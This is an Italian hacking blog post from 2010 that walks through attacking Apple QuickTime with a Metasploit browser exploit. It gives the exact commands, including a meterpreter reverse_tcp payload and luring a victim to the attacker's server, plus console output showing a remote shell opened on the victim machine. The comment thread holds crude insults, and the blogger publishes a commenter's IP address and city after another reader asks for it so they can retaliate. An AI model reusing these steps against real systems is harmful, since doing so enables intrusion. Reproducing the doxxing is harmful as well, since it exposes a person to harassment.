ClsHack:Computer Security Blog    

Apple QuickTime

Posted on: 31 August 2010

Il 12 agosto 2010 è stata fixata con la versione 7.6.7 di QuickTime una falla critica che permetteva l’esecuzione di codice remoto sul pc vittima.

[METASPLOIT]Apple QuickTime 7.6.6 Invalid SMIL URI Buffer Overflow

Ora il 31 agosto 2010, QuickTime soffre ancora e mette a repentaglio la sicurezza degli utenti.

Vediamo come sfruttare questo exploit con metasploit o.O

Aggiorniamo metasploit:
sudo svn update
Prendiamo l’exploit:
use windows/browser/apple_quicktime_marshaled_punk

Nostro ip, dove andrà in ascolto il server sulla 8080 (porta cambiabile show options)
set URIPATH /
Usiamo meterpreter:
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST IP
exploit
Adesso facciamo visitare alla vittima:
IP:8080
msf exploit(apple_quicktime_marshaled_punk) >
[*] Sending Apple QuickTime 7.6.7 _Marshaled_pUnk Code Execution exploit HTML to 192.168.1.153:1108...

Ed la bella shell aperta :D

msf exploit(apple_quicktime_marshaled_punk) > sessions -l
[*] Sending stage (748544 bytes) to 192.168.1.153
[*] Meterpreter session 1 opened (192.168.1.21:4444 -> 192.168.1.153:1109) at Tue Aug 31 11:22:39 +0200 2010
[*] Session ID 1 (192.168.1.21:4444 -> 192.168.1.153:1109) processing AutoRunScript 'migrate -f'
[*] Current server process: IEXPLORE.EXE (2292)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 2696

Active sessions
===============

  Id  Type         Information                                Connection
  --  ----         -----------                                ----------
  1   meterpreter  CLSHACKX-APAZR1\clshack @ CLSHACKX-APAZR1  192.168.1.21:4444 -> 192.168.1.153:1109

Good Luck :D

DOWNLOAD POC-EXPLOIT

Related posts:

  1. [METASPLOIT]Apple QuickTime 7.6.6 Invalid SMIL URI Buffer Overflow
  2. [CVE-2010-1297]Metasploit:Flash Player 9x, 10.0 Remote code Excution
  3. [Metasploit] multi/handler :D
  4. IE 6/7 EXPLOIT XML Remote Code Execution with METASPLOIT
  5. [CVE-2010-2568]Metasploit:windows Oday Remote Code Exuction

This entry was posted on Tuesday, August 31st, 2010 at 9:25 am and is filed under Hacking. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

Tagged with:

  • Pingback: Apple QuickTime

  • Pingback: news sul mondo della programmazione » Apple QuickTime

  • http://www.clshack.it falso_nome

    ma oltre a rippare articoli exploit altrui lamerino di un ragazzino tu e sto blog di merda come te impara a fare qualcosa di nuovo strunzzz Alessio Dalla Piazza te lo infilerei in culo ehehehe

  • clshack

    @falso_nome:

    ma oltre a rippare articoli exploit altrui lamerino di un ragazzino tu e sto blog di merda come te impara a fare qualcosa di nuovo strunzzz Alessio Dalla Piazza te lo infilerei in culo ehehehe

    Le tue offese non mi muovono o.o idiota, non ho copiato nessun articolo e exploit, se copio qualcosa, CITO SEMPRE LA FONTE, sei solo te che parli a caso… e non mi dai mai prove :P

    Io sono disposto a discutere con le persone normali, per migliorarmi… ma tu non mi sembri una persona normale offendi… usi false email per non essere contattato le tue critiche sono generali e non si capisce un cazzo :P

    Vediamo se hai le palle di rispondere oppure di contattarmi via mail e qui il lamer sei te -.-’ che cerca inutilmente di attaccarmi il blog o.o tempo perso :P

  • Phosphore

    Oh.. e io che pensavo che i lamerozzi non avrebbero osato entrare in un blog di vero hacking.. Ormai sono ovunque, devi rassegnarti ale.. :D
    @falso_nome buzzurro

  • Mirko

    @clshack:
    Esponici il suo IP (di falso_nome) e il suo User-Agent che gli insegnamo noi a stare sul mondo!

  • clshack

    @Phosphore:

    Tanto forse ho capito chi è :P

    @Mirco:

    Il suo ip è 82.49.23.134, è di rete telecom e quindi è dinamico… cambia sempre :P

    E’ di bari poi….